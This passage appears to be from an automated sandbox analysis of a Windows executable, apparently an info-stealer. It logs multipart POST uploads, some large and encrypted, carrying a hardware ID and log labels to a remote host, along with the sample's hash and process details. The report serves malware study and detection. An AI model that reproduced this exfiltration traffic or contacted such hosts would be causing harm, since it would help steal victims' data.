                                                                            Data Ascii: --92XN0U0NYXL5IDP46Content-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--92XN0U0NYXL5IDP46Content-Disposition: form-data; name="pid"2--92XN0U0NYXL5IDP46Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                            2024-11-21 12:10:22 UTC | 989 | IN | HTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:22 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=5kkb5g4md8qcd7s0ctnibnfepl; expires=Mon, 17-Mar-2025 05:57:01 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdfQ%2FGmXLeQrzk198muDzl0xYgcdnx7Y8rjzwWF%2F4oGmAuCjDc47%2BNo5pnZq%2BzRPlZFg3B2ztJqsi8SeLZdrsCFnmZeOp%2BUHyyRI5XbZ5BHaz5t1nIKogj91D81je7Ly"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60937eaf130f59-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2021&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16010&delivery_rate=1756919&cwnd=227&unsent_bytes=0&cid=7605d90a315e4b1b&ts=917&x=0"
                                                                            2024-11-21 12:10:22 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 4 | Source IP: 192.168.2.10 | Source Port: 49730 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7748 | Process: C:\Users\user\Desktop\file.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-11-21 12:10:24 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=KOV1MUE2Z06Q37QAMKS
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20448
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:24 UTC15331OUTData Raw: 2d 2d 4b 4f 56 31 4d 55 45 32 5a 30 36 51 33 37 51 41 4d 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4b 4f 56 31 4d 55 45 32 5a 30 36 51 33 37 51 41 4d 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 4f 56 31 4d 55 45 32 5a 30 36 51 33 37 51 41 4d 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                            Data Ascii: --KOV1MUE2Z06Q37QAMKSContent-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--KOV1MUE2Z06Q37QAMKSContent-Disposition: form-data; name="pid"3--KOV1MUE2Z06Q37QAMKSContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                            2024-11-21 12:10:24 UTC5117OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: `?lpQ0/74G6(~
                                                                            2024-11-21 12:10:24 UTC | 986 | IN | HTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:24 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=6vake9vqa69ln1ldmn7p0up4rd; expires=Mon, 17-Mar-2025 05:57:03 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khG%2F3LlfaDko0zvHYDrBjwXuycTD7wQJB38AsuT3eJkDyQfUuj4%2FdqA0zg77qk5kPs3iK2wysq6K%2BUxKESMk8haoDGHQtcegPWzQFBmuKaLF9ZRHj1B5vO%2FSGlxxaA1X"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60938d6f0942cb-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1643&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21408&delivery_rate=1819314&cwnd=175&unsent_bytes=0&cid=d6f112d560002c54&ts=866&x=0"
                                                                            2024-11-21 12:10:24 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 5 | Source IP: 192.168.2.10 | Source Port: 49736 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7748 | Process: C:\Users\user\Desktop\file.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-11-21 12:10:26 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=YK33R37UURU
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1197
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:26 UTC1197OUTData Raw: 2d 2d 59 4b 33 33 52 33 37 55 55 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 59 4b 33 33 52 33 37 55 55 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4b 33 33 52 33 37 55 55 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 4b 33 33 52 33 37 55 55 52 55
                                                                            Data Ascii: --YK33R37UURUContent-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--YK33R37UURUContent-Disposition: form-data; name="pid"1--YK33R37UURUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YK33R37UURU
                                                                            2024-11-21 12:10:27 UTC | 981 | IN | HTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:27 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=qmv46jv2e24il5gc98fdh1lila; expires=Mon, 17-Mar-2025 05:57:05 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQ4tuaaAL39LWHNhNrBA0bCySHyV6LlxUO%2FM2SUN90U6zFkKu5UmWWrDefehv03lVXs79%2B9aHRTWP0jjbNmFvftw42E5nvHkiS%2B9akflR8eWmvPvKPT17QMXt4zCqHGW"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60939caa29421d-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2104&delivery_rate=1763285&cwnd=190&unsent_bytes=0&cid=607f5274810e6f9b&ts=726&x=0"
                                                                            2024-11-21 12:10:27 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 6 | Source IP: 192.168.2.10 | Source Port: 49744 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7748 | Process: C:\Users\user\Desktop\file.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-11-21 12:10:28 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=YSONZWT4DXTKH
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 585323
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 2d 2d 59 53 4f 4e 5a 57 54 34 44 58 54 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 59 53 4f 4e 5a 57 54 34 44 58 54 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 53 4f 4e 5a 57 54 34 44 58 54 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 53 4f 4e 5a
                                                                            Data Ascii: --YSONZWT4DXTKHContent-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--YSONZWT4DXTKHContent-Disposition: form-data; name="pid"1--YSONZWT4DXTKHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YSONZ
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: f7 9f 3a 7f d4 a9 56 60 2f 3d 5f 2d 59 a0 59 2b cd 4d c8 5a 99 c5 c0 fb 49 02 45 9f b9 16 7b 08 ee f8 20 e8 e0 93 3d 54 f8 de 63 c2 f4 97 ef d7 bf 35 30 40 79 b6 a6 cb ea b6 93 08 9b 3c a0 27 3a fb 73 a8 c5 0e 81 67 d7 65 9b cd 8d 65 cd 88 40 74 19 58 5c 66 b5 bf d0 60 2b 82 8d 45 14 4b f6 5f d0 01 23 bd e6 06 6b ce b2 0e 99 fa 1e 28 d6 d7 76 99 4b 80 61 b2 0f 6c 0c fc 62 8c 9e 44 f1 d3 7c fd 11 17 35 53 89 92 d0 f7 1d 73 13 1e ad 89 9a 7b f5 bf 95 99 27 89 c0 94 27 84 cc 6f 96 0c e6 c7 6d 51 90 d7 07 d4 a1 56 e5 19 4d 0b 04 45 f1 d7 35 8f 2a b1 1c 17 47 9b bc 08 bd 4c d6 36 ac b0 24 50 89 08 fb 04 32 7c d7 fa 4a ae 01 c6 40 75 82 e4 61 58 5b e3 5b 94 3c ab 16 45 38 bc e0 28 8f be f8 ce b1 55 b6 37 67 06 3d 4b 8b 83 c6 3f 90 19 dc 5f 0b 8c fd cc b6 ef 09
                                                                            Data Ascii: :V`/=_-YY+MZIE{ =Tc50@y<':sgee@tX\f`+EK_#k(vKalbD|5Ss{''omQVME5*GL6$P2|J@uaX[[<E8(U7g=K?_
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: d4 96 b6 68 01 c0 18 74 38 8f e6 fb 42 37 30 bd fb d3 c5 f6 d2 f2 9f a0 d5 a5 a0 d9 5b 94 54 bc cc 01 54 d8 c4 6c 56 7d 82 06 bd ce b0 82 df b9 69 c5 c0 5c 53 4f b8 4a b6 fd 76 76 ec c7 d7 43 a2 b3 6e 18 a0 a3 d7 31 24 98 3e 1a a6 08 c8 e3 1b d0 14 c4 87 36 46 9e ce 27 c4 53 7d 71 df 15 33 c9 97 42 ba 20 c4 2c 21 78 00 c8 74 7f d8 cc fe b0 3d 32 9c 08 ca f3 80 85 73 b5 06 4d da 7b b9 af 39 3f 2a 88 28 f1 c6 b9 a3 4d a8 f8 a6 61 e9 56 e3 5f fa 32 e3 57 cf 6b 23 b3 54 b1 fa 75 ee f9 9d 6a e8 ff 68 f6 7d f7 6a de 12 0a 90 44 6e 91 bf 11 2d 78 c3 a2 5d 22 84 a4 78 c8 e1 94 4c 8e 26 f0 a8 8d 46 04 b8 76 7f eb 6b ce 47 0a 85 92 3a f4 6e 17 59 c3 d5 55 f0 c4 65 8d 11 00 d5 30 5d 66 1b 2d cd 5c 9c 2b 89 78 8f 93 b7 6c 06 7a a4 6e 5b 5b e7 cc bd c5 ee c0 d2 93 24
                                                                            Data Ascii: ht8B70[TTlV}i\SOJvvCn1$>6F'S}q3B ,!xt=2sM{9?*(MaV_2Wk#Tujh}jDn-x]"xL&FvkG:nYUe0]f-\+xlzn[[$
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: ee 65 00 0a 75 86 ff f9 7a f1 c6 96 1f a3 9b 4b ca e3 59 40 7c a4 62 75 02 37 b7 04 05 ea 05 e9 0b 9d 61 b1 5f 6b bc 24 ff f3 72 5e 26 89 6f 0b 6e af 2c 19 36 06 ef 15 65 2e 0e 5d f4 9d 7f 02 f1 fe a4 9a 60 27 e9 a5 41 ad 11 70 fc 2c 06 e0 64 43 19 f9 a7 b2 94 70 c7 46 aa dd 1a 99 22 02 8c 71 61 ba 6d f3 bf a6 27 f2 eb 91 29 6f df 19 f4 70 45 c6 35 d8 78 27 ea f2 2c ed fb ff 6e 31 12 00 25 02 7f 6e 17 d0 02 3d c2 ec 78 53 ba 86 21 98 f5 3f 43 cc 06 9a a8 1d 8b dd c0 4b 8c eb bd 1f e6 84 02 ee 37 7f 59 fc 70 15 e0 5c bf 5b 94 9f 63 0e 31 e9 61 89 13 a0 2d a2 fa 2a a0 b5 ec d8 97 52 c3 4d 54 a2 23 c4 05 a7 b5 e6 0c c0 21 60 aa 8c da b9 4c b0 95 8b 40 1e 2a 7a 2c 15 11 f0 1a f7 e8 05 16 46 57 56 6d c1 29 8c 23 4b 60 a0 f3 b7 25 c8 c9 14 b1 0c e0 fb fb 3b c8
                                                                            Data Ascii: euzKY@|bu7a_k$r^&on,6e.]`'Ap,dCpF"qam')opE5x',n1%n=xS!?CK7Yp\[c1a-*RMT#!`L@*z,FWVm)#K`%;
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 92 d4 54 a2 3f d8 b9 2e 9b 42 49 cc 3c 33 18 5a ae 23 a5 85 84 84 13 1c 6d 4d b3 32 48 ef 35 e5 22 a2 82 a6 61 e7 8e 88 9f b2 b5 72 b0 52 d6 db 7c 6c f3 8f 13 b9 0f e4 26 69 14 2c d9 f7 47 f0 a1 a5 54 0e 68 9e 43 67 aa 6d 67 ce f0 04 e6 f4 29 82 eb fa 23 2d 43 6c 92 70 9b b0 28 31 0e d8 8c 56 97 20 8e 3b 52 20 51 29 d6 79 9e 58 d1 e3 e0 5a 21 04 db 4e d9 8a d6 f4 8c 9c 64 00 93 5a fb 6c 40 9d e2 58 13 99 7f 2b 0c ef 6f e6 e9 0d 75 93 fb 8b 89 7e 9c 73 fe 98 be 71 62 c2 d0 b4 aa 49 85 fc ad e1 e8 81 a0 ac c6 5f b6 41 18 45 f9 9a 2c e4 5e 7f 58 cc a5 c8 e2 84 d2 a7 e5 6b 98 cd 8e 5e 52 6a a8 b9 a8 6b 00 aa af 94 c6 bd 20 bd 54 2c 6c 04 33 44 52 74 ae 7a 0a 1c c7 ec 14 21 a2 84 cd bc 25 5b 3d f9 ba 42 0f af 16 ae 4d 38 76 67 25 ec f2 4c b3 27 6d 88 72 7a 3d
                                                                            Data Ascii: T?.BI<3Z#mM2H5"arR|l&i,GThCgmg)#-Clp(1V ;R Q)yXZ!NdZl@X+ou~sqbI_AE,^Xk^Rjk T,l3DRtz!%[=BM8vg%L'mrz=
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: a3 36 2d 4d f3 c9 2f ab b5 5c a3 cb 8c 17 02 03 86 5d 5b 68 e0 d0 84 a2 9d 55 48 c8 00 20 9d 51 3c 28 ed 7e d5 cb 61 75 f5 9f 53 af d1 41 c3 4f f7 2e 86 12 f6 0d 14 39 99 17 2e 24 7f c9 60 9f 92 36 e7 9d 7f 25 ad 58 b2 54 3a 49 ff 73 10 c3 9a e0 6a ea 2d cf 59 dc 04 af a7 ab 27 86 f5 0e 00 3a 87 37 74 8a ae 48 a4 a7 73 57 16 fc 8d 44 16 4b f3 36 86 55 04 96 3e 7b 6f cd b2 2a ef c8 27 ec 11 03 4d 52 11 6a be d4 10 b0 45 24 93 68 24 98 2c c9 98 f1 16 97 b1 7d 71 e3 5a cd ae 03 d5 77 4e 1d c3 ab a7 e8 db 00 fa c8 4d c5 69 31 10 ca 65 0e b7 74 ba 7f e1 e6 bf bd 04 7f 2d 0d 62 f6 dc 4e 42 d3 ee 92 b7 fb fd ed c1 e7 13 b0 3b b6 cf 1a e3 dc 24 a5 50 eb 47 aa ab 94 00 cd ef 94 29 02 89 a5 30 52 5f b1 2b f4 d4 79 7f 01 10 c4 87 62 42 a0 e2 2e a0 7c 21 7a 4e 66 7f
                                                                            Data Ascii: 6-M/\][hUH Q<(~auSAO.9.$`6%XT:Isj-Y':7tHsWDK6U>{o*'MRjE$h$,}qZwNMi1et-bNB;$PG)0R_+ybB.|!zNf
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 28 37 88 78 e4 ef 0f 2a 60 83 f6 f7 d3 b6 e5 3f 3f 32 6e 9c 4a 34 3b f5 4c ed 81 94 86 bd 82 e1 fa a4 53 5b 46 bc c1 28 e5 bb a9 88 a1 84 e1 06 2d a2 0d 5d c5 f1 5d cd 76 e0 ec df fa 46 e5 58 38 a1 58 66 bc c0 2f f3 8a 0d 00 43 ca df 08 d3 9c b2 23 43 af da c4 3c 3f 81 c5 5e e7 54 c3 3b 10 91 23 7b 41 26 46 15 26 74 01 14 04 f1 01 fd 07 c0 c6 72 fe c9 ed 1c 88 32 69 48 fb 72 07 1a 8a 44 c3 ba fb 63 81 29 a9 74 e5 2c 2f 60 34 d0 e3 e5 8e 80 8d e4 99 8c e9 47 ec af 77 3d 35 b1 91 3e b8 fd 78 0c 46 c1 be 27 21 28 85 9b d2 5f 2b 5b 8e fe ea d1 44 7e 7f 82 d5 f2 b3 22 e8 fc 1f 34 ed e2 18 0d 49 a1 c9 8f 8f 80 1e 0d a2 ce 45 90 2f 88 41 cc ba 0d 0c cc bf 7d 01 5b 1f 0a 43 fe 35 27 5d 63 d7 6d 54 d8 3b cc 1b a4 fc 68 06 1d 38 cf 5a 6c 8f 2e 10 d4 05 fb d4 a1 73
                                                                            Data Ascii: (7x*`??2nJ4;LS[F(-]]vFX8Xf/C#C<?^T;#{A&F&tr2iHrDc)t,/`4Gw=5>xF'!(_+[D~"4IE/A}[C5']cmT;h8Zl.s
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: d2 fc f6 e8 8b 59 3e 90 62 77 9f 3a 06 c1 e5 29 6a 40 47 ea 2d a0 ec f1 bd 8d 9a bf 69 86 d8 bb 8d 86 c5 86 cf e9 ad 35 55 7e 20 81 01 6d 4f 15 17 d5 79 2b 41 b7 2a ea 1f 83 d2 eb 60 6b 51 41 fe 9e f6 c9 3c 93 2a 09 4c e1 39 c7 70 92 aa 1e 06 da 22 a2 f4 f5 d0 b2 42 bb b3 62 ef 54 59 76 1c 94 b9 1a 24 35 3d 75 da b8 86 84 60 29 97 83 8a b0 1a 3a 5d 3e 81 9c 00 12 84 c9 b4 f2 d9 d6 a0 53 3f ab 0e ee 50 a0 2b ce 8b a3 6e 9f 8b 41 91 f8 b5 50 97 24 6a 26 ac bc d1 d6 c9 80 e8 48 40 70 37 43 47 03 df 1d 09 17 93 df a4 3c 67 67 ee 52 9e 16 c4 b0 d0 8b 56 8d 99 9a c8 0f 9a 90 e2 39 fa 08 b7 82 5b c6 6d ce 2a 55 44 bb 46 dd ff 56 11 b4 03 f3 46 a0 ad e1 71 ed 2c 09 36 52 e7 12 71 d7 dd 64 ee 18 85 eb 9b 85 42 ab c4 9c 4f 98 c8 9a 14 47 de 59 cf 0b 38 5b 04 57 0e
                                                                            Data Ascii: Y>bw:)j@G-i5U~ mOy+A*`kQA<*L9p"BbTYv$5=u`):]>S?P+nAP$j&H@p7CG<ggRV9[m*UDFVFq,6RqdBOGY8[W
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 03 17 f6 65 5e 23 3e 5c 1e 96 9d d5 97 88 be 51 67 95 0a 4d 5b 68 2a 28 a4 9f 78 c0 bb d1 a5 9d a3 52 a3 8e 82 95 22 b2 1f 2c be 63 d8 66 fd ea ac 31 08 ab ca 1a 73 e0 97 fa d0 d4 f6 05 20 29 41 06 a5 0d c8 a5 8a cd 0b 46 62 92 05 9b 6a e3 ad 72 ce 76 65 7b 5a ef 78 8e d3 97 a1 8c 9f a7 0e 55 db 8c fd 85 f1 e3 c6 d7 35 de f1 99 60 bd c5 5c 8d bd 33 bf b2 40 a3 a0 e7 ef b3 9f f6 be bc 59 89 5e 70 e8 db 7c dd af e7 7a f0 b9 c1 ed 7f ef 5c 92 4b 1b 3c c4 dd 43 dc fa b7 48 15 fa 63 02 6f 8a 30 f5 41 b2 2e 81 6c 79 0e f9 22 c8 d3 76 78 c9 f2 39 c2 ba 22 e8 a6 fd 12 51 8f 8f 72 63 25 62 25 c1 45 7d 27 9a 9d 38 f3 f5 48 6b 29 e7 3c cb 5b 78 70 ea b4 81 04 59 a5 2f b9 53 b2 2a 45 f3 a9 ab 4a 35 43 c2 97 19 a6 f2 35 30 38 7b 3e 00 87 ed 6c 18 a3 cd 09 08 50 d5 8a
                                                                            Data Ascii: e^#>\QgM[h*(xR",cf1s )AFbjrve{ZxU5`\3@Y^p|z\K<CHco0A.ly"vx9"Qrc%b%E}'8Hk)<[xpY/S*EJ5C508{>lP
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: af bc d6 d4 cb 09 2a a0 54 ce 54 4b a4 75 d4 c7 ca 2c 65 a4 86 ec a9 ba f2 bd 70 bd aa cc f1 5b 04 68 fe f7 8e f8 40 72 fb 05 4e 0e 67 eb 93 c6 3f 1d 47 92 ed be fc 9b fd 29 ed ea f3 66 94 ac ef fd c6 a3 e7 f9 d7 6c 3e 79 f4 bd 55 b0 73 59 78 e1 66 39 75 ae fb 95 66 cf ad 49 9b 70 1d 74 5d d6 2b 42 98 61 a0 6b 86 e9 6e c5 c2 12 99 c0 0b be f9 f9 ca b3 3a 8e a6 0c 0f c3 86 ff 92 dc 5f 69 14 e7 1c 95 7a 08 cf 67 75 bc 56 15 29 d9 98 41 f1 b4 ec bf 8e 97 f8 50 33 87 23 25 6d 2a 75 00 be 73 47 45 47 fe b3 8a 50 44 3c 7a 49 a3 3c 7f fc 49 11 8e c6 21 fb 29 0d 66 8b 02 a0 44 ba c7 2e 39 ac b8 74 63 4d c9 f6 cb 01 97 24 7d ac 85 5b 3b 5a e9 1f fc ac 16 bb 2e f1 a1 2d 26 05 b6 64 cd d9 ab 07 46 3a 18 5f fa 7d f5 e6 9e 9c fa 55 b5 b2 98 d4 be 18 24 bc c0 5c c8 dc
                                                                            Data Ascii: *TTKu,ep[h@rNg?G)fl>yUsYxf9ufIpt]+Bakn:_izguV)AP3#%m*usGEGPD<zI<I!)fD.9tcM$}[;Z.-&dF:_}U$\
                                                                            2024-11-21 12:10:32 UTC | 990 | IN | HTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:32 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=h75pap3q5ua7b6aqkg9a5b5ecm; expires=Mon, 17-Mar-2025 05:57:09 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLqXvNLX%2BMlWW%2FwS1cdB%2FrQ7VjHOhUZM1agkugCVRF058vPv1jBQdod2bYinteAOV8Qt01bWama5xuWcJvUXu2Y2i2ZtdOF8Utr1uex1Vp6CYOKpw7CwDg3lSFcS%2Fxvb"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e6093ac4dab8c0c-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1868&sent=329&recv=614&lost=0&retrans=0&sent_bytes=2829&recv_bytes=587906&delivery_rate=1574123&cwnd=206&unsent_bytes=0&cid=aa5f2890b2d238bb&ts=3644&x=0"



                                                                            Target ID:0
                                                                            Start time:07:10:11
                                                                            Start date:21/11/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x330000
                                                                            File size:1'843'200 bytes
                                                                            MD5 hash:02FC2C82DE8B775D97A32A39E1D34960
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:57.5%
                                                                              Total number of Nodes:233
                                                                              Total number of Limit Nodes:13

                                                                              Control-flow Graph: function 354800 (graph omitted)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
